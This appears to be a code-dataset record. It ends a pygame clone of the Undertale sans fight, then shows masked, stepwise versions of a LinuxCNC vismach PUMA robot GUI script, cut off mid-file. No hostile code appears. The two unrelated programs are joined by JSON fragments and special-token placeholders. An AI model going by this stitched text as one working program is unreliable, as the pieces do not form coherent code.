pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n \ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] - 10, BOX_POS[1] + BOX_SIZE[1] + 10],\n angle=-45,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n \ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[50, BOX_POS[1] + 50],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=100\n )\n )\n \ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[BOX_POS[0] + BOX_SIZE[0], 50],\n angle=90,\n time1=10,\n time2=70,\n time3=0,\n width=60\n )\n )\n blasters.append(\n GasterBlaster(\n pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0,\n time1=10,\n time2=70,\n time3=0,\n width=100\n )\n )\n \ndef flash_round_7():\n set_turn_time(150)\n global BOX_SIZE, BOX_POS, _boxpos, _boxsize\n BOX_POS = _boxpos = [230, 230]\n BOX_SIZE = _boxsize = [150, 150]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2]\n for _ in range(3):\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 50 + 20,\n length=150,\n angle=-20,\n speed=[0, 4, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 50 + 20,\n length=150,\n angle=20,\n speed=[0, -4, 0, 0]\n )\n )\n \n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],\n time1=1000,\n time2=_ * 50 + 50,\n length=150,\n angle=20,\n speed=[0, 4, 0, 0]\n )\n )\n bones.append(\n RotatableBone(\n pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],\n time1=1000,\n time2=_ * 50 + 50,\n length=150,\n angle=-20,\n speed=[0, -4, 0, 0]\n )\n )\n \n\nrandom_attacks = [flash_round_1,\n flash_round_2,\n flash_round_3,\n flash_round_4,\n flash_round_5,\n flash_round_6,\n flash_round_7]\nfor _ in range(5):\n attacks.append(random.choice(random_attacks))\n attacks.append(flash_round)\n \nplayers_turn(\"* ...\")\n \n@add_attack\ndef windmill():\n set_turn_time(1200)\n global BOX_POS, BOX_SIZE, before_strike, after_strike\n def before_strike():\n global sans_damage\n sans_damage = 1\n after_strike = lambda : ...\n BOX_POS = [150, 240]\n BOX_SIZE = [150, 150]\n\n def movegb(screen):\n for i in range(4):\n blasters[i].angle += 1\n blasters[i].end_angle += 1\n blasters[i].radian += radians(-1)\n blasters[i].back_speed = 0\n\n for angle in range(360 * 5):\n tasks.append(Task(movegb, angle * 0.4 + 100))\n \n def enablerecoil(screen):\n for b in blasters:\n b.norecoil = False\n\n tasks.append(Task(enablerecoil, 800))\n\n for angle in range(0, 360, 90):\n blasters.append(GasterBlaster(\n pos=[150 + 150 / 2, 240 + 150 / 2],\n angle=angle,\n time1=10,\n time2=1000,\n width=30,\n time3=0,\n norecoil=True\n ))\n\nplayers_turn(\"* ...\")\n\n@add_attack\ndef gameend():\n ...\n\n# ------------------------------------\n\"\"\"主程序\"\"\"\n\nwhile True:\n # ---------------------------------------------------------\n '''实例化'''\n from locals_ import *\n time = 0\n _boxpos = [0, 0]\n _boxsize = SCREEN_SIZE[:]\n rightdown = SCREEN_SIZE[:]\n\n time1 = 0\n time2 = 0\n delta = 1\n blasters = []\n bones = []\n tasks = []\n warns = []\n texts = []\n boards = []\n before_strike = None\n after_strike = None\n sans = Sans([280, 80])\n player = Player([0, 0])\n actions = {\n \"* check\" : CHECK_SANS,\n \"* heal ({} time(s) left)\" : HEAL_SANS\n }\n mc_actions = {\n \"* spare\" : MERCY_SANS_SPARE,\n \"* flee\" : MERCY_SANS_FLEE\n }\n pygame.mixer.music.stop()\n if FULL_SCREEN:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\n else:\n display = pygame.display.set_mode(SCREEN_SIZE)\n while True:\n time1 = time_.time()\n # 屏幕震动\n if screen_shaking:\n screen_offset[0] = random.randint(-5, 5)\n screen_offset[1] = random.randint(-5, 5)\n else:\n screen_offset = [0, 0]\n # 屏幕旋转\n if spinning_left:\n screen_angle -= 1\n # 屏幕旋转\n if spinning_right:\n screen_angle += 1\n # 测试区\n if DEBUG:...\n # 战斗框位移\n if _boxpos[0] != BOX_POS[0]:\n if abs(BOX_POS[0] - _boxpos[0]) < 0.1:\n _boxpos[0] = BOX_POS[0]\n else:\n _boxpos[0] += (BOX_POS[0] - _boxpos[0]) / 5\n if _boxpos[1] != BOX_POS[1]:\n if abs(BOX_POS[1] - _boxpos[1]) < 0.1:\n _boxpos[1] = BOX_POS[1]\n else:\n _boxpos[1] += (BOX_POS[1] - _boxpos[1]) / 5\n\n # 战斗框大小\n if rightdown[0] != BOX_POS[0] + BOX_SIZE[0]:\n if abs(BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) < 0.1:\n rightdown[0] = BOX_POS[0] + BOX_SIZE[0]\n else:\n rightdown[0] += (BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) / 5\n if rightdown[1] != BOX_POS[1] + BOX_SIZE[1]:\n if abs(BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) < 0.1:\n rightdown[1] = BOX_POS[1] + BOX_SIZE[1]\n else:\n rightdown[1] += (BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) / 5\n _boxsize = [\n rightdown[0] - _boxpos[0],\n rightdown[1] - _boxpos[1]\n ]\n\n if time >= len(attacks):\n exit()\n if not stop and not is_players_turn:\n attacks[time]()\n time += 1\n stop = True\n\n screen.fill((0, 0, 0, 255))\n display.fill((0, 0, 0))\n mask_surface_blue.fill((0, 0, 0, 0))\n mask_surface_orange.fill((0, 0, 0, 0))\n mask_surface_normal.fill((0, 0, 0, 0))\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n pygame.quit()\n exit()\n if event.key in (K_z, K_RETURN):\n if sans.show_index >= len(sans.text) and sans.show_text == True:\n sans.show_text = False\n stop = False\n elif page in (CHECK_SANS, HEAL_SANS, HEAL_SANS_CANT) and shown_index >= len(battle_text):\n is_players_turn = False\n stop = False\n page = MAIN_PAGE\n player.pos = [\n BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2\n ]\n player.select_sound.play()\n else:\n player.choose = is_players_turn\n if is_players_turn and page != FIGHT_SANS:\n player.select_sound.play()\n if event.key in (K_x, K_RSHIFT):\n sans.show_index = len(sans.text)\n shown_index = len(battle_text)\n player.back = True\n player.choice = 0\n if event.key == K_UP:\n player.going_up = True\n if event.key == K_DOWN:\n player.going_down = True\n if event.key == K_LEFT:\n player.going_left = True\n if event.key == K_RIGHT:\n player.going_right = True\n if event.key == K_F4:\n if FULL_SCREEN:\n display = pygame.display.set_mode(SCREEN_SIZE)\n FULL_SCREEN = 0\n else:\n display = pygame.display.set_mode((1920, 1080), FULLSCREEN)\n FULL_SCREEN = 1\n if event.key == K_F2:\n restarting = True\n \n if DEBUG:\n if event.key == K_n:\n bones.clear()\n boards.clear()\n blasters.clear()\n stop = False\n if event.key == K_EQUALS:\n frames += 1\n if event.key == K_MINUS:\n frames -= 1\n if event.type == KEYUP:\n if event.key == K_UP:\n player.going_up = False\n if event.key == K_DOWN:\n player.going_down = False\n if event.key == K_LEFT:\n player.going_left = False\n if event.key == K_RIGHT:\n player.going_right = False\n if event.key == K_ESCAPE:\n pygame.quit()\n exit()\n if event.key in (K_z, K_RETURN):\n player.choose = False\n if event.key in (K_x, K_RSHIFT):\n player.back = False\n\n '''检测&更新'''\n \n # 战斗框\n pygame.draw.rect(screen, (255, 255, 255, 255), pygame.Rect((_boxpos[0] - 5, _boxpos[1] - 5),\n (_boxsize[0] + 10, _boxsize[1] + 10)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect(_boxpos, _boxsize)) # 内遮挡\n # 骨头\n for b in bones:\n b.show(screen,\n mask_surface_blue,\n mask_surface_orange,\n mask_surface_normal)\n if b.stop:\n bones.remove(b)\n # 警告框\n for w in warns:\n w.show(screen)\n if w.stop:\n warns.remove(w)\n # 板子\n for b in boards:\n b.show(screen)\n if b.stop:\n boards.remove(b)\n \n if b.rect.colliderect(player.rect) and player.falling:\n player.pos[0] += b.speed[0]\n player.pos[1] += b.speed[1]\n if player.direction == DOWN:\n player.pos[1] = b.rect.top - 7\n elif player.direction == UP:\n player.pos[1] = b.rect.bottom - 1\n elif player.direction == RIGHT:\n player.pos[0] = b.rect.left - 7\n elif player.direction == LEFT:\n player.pos[0] = b.rect.right - 1\n player.falling = False\n\n \"\"\"外遮挡\"\"\"\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, 0), (SCREEN_SIZE[0], _boxpos[1] - 5)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] - 5), (_boxpos[0] - 5, _boxsize[1] + 10)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] + _boxsize[1] + 5),\n (SCREEN_SIZE[0], SCREEN_SIZE[1] - (_boxpos[1] + _boxsize[1]) - 5)))\n pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((_boxpos[0] + _boxsize[0] + 5, _boxpos[1] - 5),\n (SCREEN_SIZE[0] - (_boxpos[0] + _boxsize[0]) - 5, _boxsize[1] + 10)))\n \n '''显示UI(外面)'''\n pygame.draw.rect(screen, (191, 0, 0, 255), pygame.Rect((275, 400), (92, 20)))\n if player.KR:\n pygame.draw.rect(screen, (255, 0, 255, 255), pygame.Rect((275 + player.HP, 400), (round(player.KR), 20)))\n pygame.draw.rect(screen, (255, 255, 0, 255), pygame.Rect((275, 400), (player.HP, 20)))\n screen.blit(\n font2.render(\n \"{:0>2.0f} / 92\".format(player.HP + player.KR),\n True,\n (255, 255, 255) if not round(player.KR) else (255, 0, 255)\n ),\n (\n 415,\n 400\n )\n )\n screen.blit(hp_image, (240, 405))\n screen.blit(kr_image, (375, 405))\n screen.blit(\n font2.render(\n \"Chara LV 19\", True, (255, 255, 255)\n ), (30, 400)\n )\n \n # 显示文本\n for text in texts:\n screen.blit(\n font.render(\n text[1], True, (255, 255, 255)\n ), text[0]\n )\n\n if DEBUG:\n screen.blit(\n font2.render(\n \"DEBUG\", True, (0, 0, 255)\n ), (200, 0)\n )\n # 显示帧数\n screen.blit(\n font2.render(\n \"FPS:{:0>3d}\".format(round(1 / delta)), True, (0, 0, 255)\n ), (0, 0)\n )\n if fight:\n screen.blit(fight_highlight_image, fight_pos)\n else:\n screen.blit(fight_default_image, fight_pos)\n if act:\n screen.blit(act_highlight_image, act_pos)\n else:\n screen.blit(act_default_image, act_pos)\n if item:\n screen.blit(item_highlight_image, item_pos)\n else:\n screen.blit(item_default_image, item_pos)\n if mercy:\n screen.blit(mercy_highlight_image, mercy_pos)\n else:\n screen.blit(mercy_default_image, mercy_pos)\n \n # 鳝丝(要放在外面)\n sans.show(screen)\n if show_sans_damage:\n if sans_damage == MISS:\n screen.blit(miss_image, (250, 60))\n \n # GB炮(要放在外面)\n for t in blasters:\n t.show(screen,\n mask_surface_blue,\n mask_surface_orange,\n mask_surface_normal)\n if t.stop:\n blasters.remove(t)\n\n # 其他东西,blahblahblah(外面)\n for t in tasks:\n t.show(screen)\n if t.stop:\n tasks.remove(t)\n\n if is_players_turn: # 玩家回合\n BOX_POS = [30, 250]\n BOX_SIZE = [570, 130]\n if page == MAIN_PAGE:\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 16\n x = 40\n player.type = CURSOR_SOUL\n player.options = (\n (fight_pos[0] + 10, fight_pos[1] + 15),\n ( act_pos[0] + 10, act_pos[1] + 15),\n ( item_pos[0] + 10, item_pos[1] + 15),\n (mercy_pos[0] + 10, mercy_pos[1] + 15)\n )\n\n if player.choice == 0:\n fight = True\n act = False\n item = False\n mercy = False\n\n if player.choice == 1:\n fight = False\n act = True\n item = False\n mercy = False\n\n if player.choice == 2:\n fight = False\n act = False\n item = True\n mercy = False\n\n if player.choice == 3:\n fight = False\n act = False\n item = False\n mercy = True\n\n if player.choose:\n page = [FIGHT, ACT, 0, MERCY][player.choice]\n player.choose = False\n player.choice = 0\n fight = False\n act = False\n item = False\n mercy = False\n\n if page == ACT:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [ACT_SANS][player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MAIN_PAGE\n\n if page == ACT_SANS:\n player.options = []\n y = 250\n for _ in actions.keys():\n if actions[_] == HEAL_SANS:\n _ = _.format(heal_times_left)\n screen.blit(\n battle_font.render(_, True, (255, 255, 255)),\n (40, y)\n )\n player.options.append((40, y + 5))\n y += 20\n \n if player.choose:\n page = list(actions.values())[player.choice]\n if page == HEAL_SANS:\n if heal_times_left > 0:\n heal(player, 92)\n heal_times_left -= 1\n else:\n page = HEAL_SANS_CANT\n player.choose = False\n player.choice = 0\n if player.back:\n page = ACT\n\n if page == CHECK_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n battle_text = \"* Sans\\n The TRUE HERO.\\n ATK:1\\n DEF:1\\n Nothing to say.\"\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == HEAL_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n battle_text = \"* You are healthy again now.\\n* {} time(s) left.\".format(heal_times_left)\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == HEAL_SANS_CANT:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n battle_text = \"* No more times for you to heal!\"\n if shown_index < len(battle_text):\n shown_index += 1\n text_sound.play()\n x = 40\n y = 250\n for char in battle_text[:shown_index]:\n if char != '\\n':\n screen.blit(\n battle_font.render(char, True, (255, 255, 255)),\n (x, y)\n )\n x += 12\n if x > BOX_POS[0] + BOX_SIZE[0] or char == \"\\n\":\n y += 20\n x = 40\n\n if page == FIGHT:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [FIGHT_SANS][player.choice]\n player.choose = False\n player.choice = 0\n choice_pos = [50, 250]\n if player.back:\n page = MAIN_PAGE\n\n if page == FIGHT_SANS:\n player.type = RED_SOUL\n player.pos = [\n -100,\n -100\n ]\n target_img.set_alpha(target_alpha)\n if not choice_blink:\n if target_alpha >= 255:\n choice_going = True\n else:\n target_alpha += 10\n screen.blit(target_img, [BOX_POS[0] + 10, BOX_POS[1] + 5])\n screen.blit([choice_img, choice_blink_img][choice_ani_index // 5 % 2], choice_pos)\n choice_ani_index += choice_blink\n choice_pos[0] += choice_going * 8\n if choice_going and (player.choose or choice_pos[0] > BOX_POS[0] + BOX_SIZE[0]):\n choice_going = False\n choice_blink = True\n tasks.append(Strike(sans.pos[:]))\n if not before_strike:\n sans.target_pos = [100, 80]\n else:\n before_strike()\n if choice_blink:\n blink_time += 1\n if blink_time > 60:\n show_sans_damage = False\n choice_going = False\n choice_blink = False\n choice_ani_index = 0\n target_alpha = 0\n blink_time = 0\n is_players_turn = False\n stop = False\n page = MAIN_PAGE\n if not after_strike:\n sans.target_pos = [250, 80]\n else:\n after_strike()\n player.pos = [\n BOX_POS[0] + BOX_SIZE[0] / 2,\n BOX_POS[1] + BOX_SIZE[1] / 2\n ]\n elif blink_time > 30:\n target_alpha -= 10\n show_sans_damage = True\n\n if page == MERCY:\n player.options = [(40, 255)]\n screen.blit(\n battle_font.render(\"* sans\", True, (255, 255, 255)),\n (40, 250)\n )\n if player.choose:\n page = [MERCY_SANS][player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MAIN_PAGE\n\n if page == MERCY_SANS:\n player.options = []\n y = 250\n for _ in mc_actions.keys():\n screen.blit(\n battle_font.render(_, True, (255, 255, 255)),\n (40, y)\n )\n player.options.append((40, y + 5))\n y += 20\n \n if player.choose:\n page = list(mc_actions.values())[player.choice]\n player.choose = False\n player.choice = 0\n if player.back:\n page = MERCY\n\n if page == MERCY_SANS_SPARE: # 你都饶恕了,想必也不想继续玩了()\n exit()\n\n if page == MERCY_SANS_FLEE: # 你都逃跑了,想必也不想继续玩了()\n exit()\n\n # 你死了\n if player.HP + player.KR <= 0:\n DEAD = True\n if DEAD or restarting:\n break\n\n # 判定伤害\n blue_mask = pygame.mask.from_surface(mask_surface_blue)\n orange_mask = pygame.mask.from_surface(mask_surface_orange)\n normal_mask = pygame.mask.from_surface(mask_surface_normal)\n if mask_collide(blue_mask, player.mask, [0, 0], player.mask_pos):\n if any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):\n damage(player)\n if mask_collide(orange_mask, player.mask, [0, 0], player.mask_pos):\n if not any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):\n damage(player)\n if mask_collide(normal_mask, player.mask, [0, 0], player.mask_pos):\n damage(player)\n\n # 玩家\n player.show(screen, _boxpos, _boxsize)\n\n # 黑屏攻击\n if blackout:\n screen.fill(0x000000)\n\n \"\"\"将screen的图像加工后放入display\"\"\"\n if not FULL_SCREEN:\n rotated_screen = pygame.transform.rotate(screen, screen_angle)\n else:\n screen_rect = screen.get_rect()\n rotated_screen = pygame.transform.rotate(\n pygame.transform.scale(\n screen,\n (\n round(screen_rect.size[1] / screen_rect.size[0] * 1920),\n 1080\n )\n ),\n screen_angle\n )\n rotated_rect = rotated_screen.get_rect()\n if not FULL_SCREEN:\n rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]\n else:\n rotated_rect.center = [960, 540]\n display.blit(rotated_screen,\n (rotated_rect.x + screen_offset[0],\n rotated_rect.y + screen_offset[1]))\n fps.tick(frames)\n pygame.display.update()\n time2 = time_.time()\n delta = time2 - time1\n\n if not restarting:\n ticks = 0\n heart_offset = [0, 0]\n while True:\n '''死后的'''\n pygame.mixer.music.stop()\n ticks += 1\n screen.fill((0, 0, 0, 255))\n if ticks >= 200:\n break\n \n if ticks >= 160:\n screen.blit(alive_img, player.rect)\n if ticks == 160:\n split_sound.play()\n \n elif ticks >= 100:\n screen.blit(dead_img,\n (player.rect.x + heart_offset[0],\n player.rect.y + heart_offset[1]))\n heart_offset = [random.randint(-2, 2), random.randint(-2, 2)]\n \n elif ticks >= 60:\n screen.blit(dead_img, player.rect)\n if ticks == 60:\n split_sound.play()\n \n else:\n screen.blit(alive_img, player.rect)\n \n if not FULL_SCREEN:\n rotated_screen = pygame.transform.rotate(screen, screen_angle)\n else:\n screen_rect = screen.get_rect()\n rotated_screen = pygame.transform.rotate(\n pygame.transform.scale(\n screen,\n (\n round(screen_rect.size[1] / screen_rect.size[0] * 1920),\n 1080\n )\n ),\n screen_angle\n )\n rotated_rect = rotated_screen.get_rect()\n if not FULL_SCREEN:\n rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]\n else:\n rotated_rect.center = [960, 540]\n display.blit(rotated_screen,\n (rotated_rect.x + screen_offset[0],\n rotated_rect.y + screen_offset[1]))\n fps.tick(frames)\n pygame.display.update()\n",
"step-ids": [
16,
26,
28,
32,
47
]
}
|
[
16,
26,
28,
32,
47
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
<|reserved_special_token_0|>
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c = hal.component('pumagui')
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
finger1 = CylinderZ(0, 5, 50, 5)
tooltip = Capture()
link6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])
link6 = Translate([link6], 0, 0, -50)
link6 = Collection([tooltip, link6])
link6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)
link5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
link5 = Collection([link5, Translate([link6], 0, 0, 95)])
link5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)
link4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25,
-25, -45, 25, 25, -30)])
link4 = Translate([link4, link5], 0, 0, 0)
link4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)
link3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,
25)])
link3 = Translate([link3], 0, 50, 0)
link3 = Collection([link3, CylinderX(-50, 40, 40, 40)])
link3 = Collection([link3, Translate([link4], 0.0, 50, 400)])
link3 = Translate([link3], 100, 0, 0.0)
link3 = Rotate([link3], 90, 1, 0, 0)
link3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)
link2 = CylinderX(-50, 50, 50, 50)
link2 = Translate([link2], 0.0, 0.0, 400)
link2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,
85)])
link2 = Collection([link2, Translate([link3], 0, 0.0, 400)])
link2 = Rotate([link2], 90, 1, 0, 0)
link2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)
link1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]
)
link1 = Collection([link1, link2])
link1 = Translate([link1], 0.0, 0.0, 100)
link1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)
link0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
link0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])
floor = Box(-500, -500, -10, 500, 500, 0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
from vismach import *
import hal
c = hal.component('pumagui')
c.newpin('joint1', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint2', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint3', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint4', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint5', hal.HAL_FLOAT, hal.HAL_IN)
c.newpin('joint6', hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
finger1 = CylinderZ(0, 5, 50, 5)
tooltip = Capture()
link6 = Collection([finger1, Box(-25, -25, -10, 25, 25, 0)])
link6 = Translate([link6], 0, 0, -50)
link6 = Collection([tooltip, link6])
link6 = HalRotate([link6], c, 'joint6', 1, 0, 0, 1)
link5 = Collection([CylinderZ(27, 30, 35, 30), CylinderX(-13, 25, 13, 25),
Box(-11, -25, 0, 11, 25, 27)])
link5 = Collection([link5, Translate([link6], 0, 0, 95)])
link5 = HalRotate([link5], c, 'joint5', 1, 1, 0, 0)
link4 = Collection([CylinderX(-13, 22, -27, 22), CylinderX(13, 22, 27, 22),
Box(-15, -22, -30, -25, 22, 0), Box(15, -22, -30, 25, 22, 0), Box(-25,
-25, -45, 25, 25, -30)])
link4 = Translate([link4, link5], 0, 0, 0)
link4 = HalRotate([link4], c, 'joint4', 1, 0, 0, 1)
link3 = Collection([CylinderY(-50, 35, 25, 35), CylinderZ(0.0, 35, 400 - 45,
25)])
link3 = Translate([link3], 0, 50, 0)
link3 = Collection([link3, CylinderX(-50, 40, 40, 40)])
link3 = Collection([link3, Translate([link4], 0.0, 50, 400)])
link3 = Translate([link3], 100, 0, 0.0)
link3 = Rotate([link3], 90, 1, 0, 0)
link3 = HalRotate([link3], c, 'joint3', 1, 1, 0, 0)
link2 = CylinderX(-50, 50, 50, 50)
link2 = Translate([link2], 0.0, 0.0, 400)
link2 = Collection([link2, CylinderZ(400, 40, 0, 50), CylinderX(-70, 85, 70,
85)])
link2 = Collection([link2, Translate([link3], 0, 0.0, 400)])
link2 = Rotate([link2], 90, 1, 0, 0)
link2 = HalRotate([link2], c, 'joint2', 1, 1, 0, 0)
link1 = Collection([CylinderX(-70, 70, 70, 70), Box(-70, -70, 0, 70, 70, -100)]
)
link1 = Collection([link1, link2])
link1 = Translate([link1], 0.0, 0.0, 100)
link1 = HalRotate([link1], c, 'joint1', 1, 0, 0, 1)
link0 = Collection([CylinderZ(750, 75, 800, 75), CylinderZ(25, 90, 750, 50),
CylinderZ(0, 200, 35, 200)])
link0 = Collection([link0, Translate([link1], 0.0, 0.0, 800)])
floor = Box(-500, -500, -10, 500, 500, 0.0)
work = Capture()
model = Collection([link0, floor, work])
main(model, tooltip, work, 1500)
<|reserved_special_token_1|>
#! /usr/bin/python2
# Copyright 2007 John Kasunich and Jeff Epler
#
# modified by Rudy du Preez to fit with the kinematics component pumakins.c
# Note: DH parameters in pumakins halfile should bet set to
# A2=400, A3=50, D3=100, D4=400, D6=95
#
# z |
# |
# |__________y top of the base.
# /
# / A2
# x /
# /_______
# D3 /
# / A3
# |
# |
# | D4
# |___
# |
# tooltip | D6
#
# or they should be changed below to fit. Otherwise you wont get straight lines
# moving x or y or z in world mode. If all is correct the tool should rotate
# about its tip with no x,y,z movement for changes in A,B,C at any point in the
# workspace.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from vismach import *
import hal
c = hal.component("pumagui")
c.newpin("joint1", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint2", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint3", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint4", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint5", hal.HAL_FLOAT, hal.HAL_IN)
c.newpin("joint6", hal.HAL_FLOAT, hal.HAL_IN)
c.ready()
###################
# tool or finger
finger1 = CylinderZ(0, 5, 50, 5)
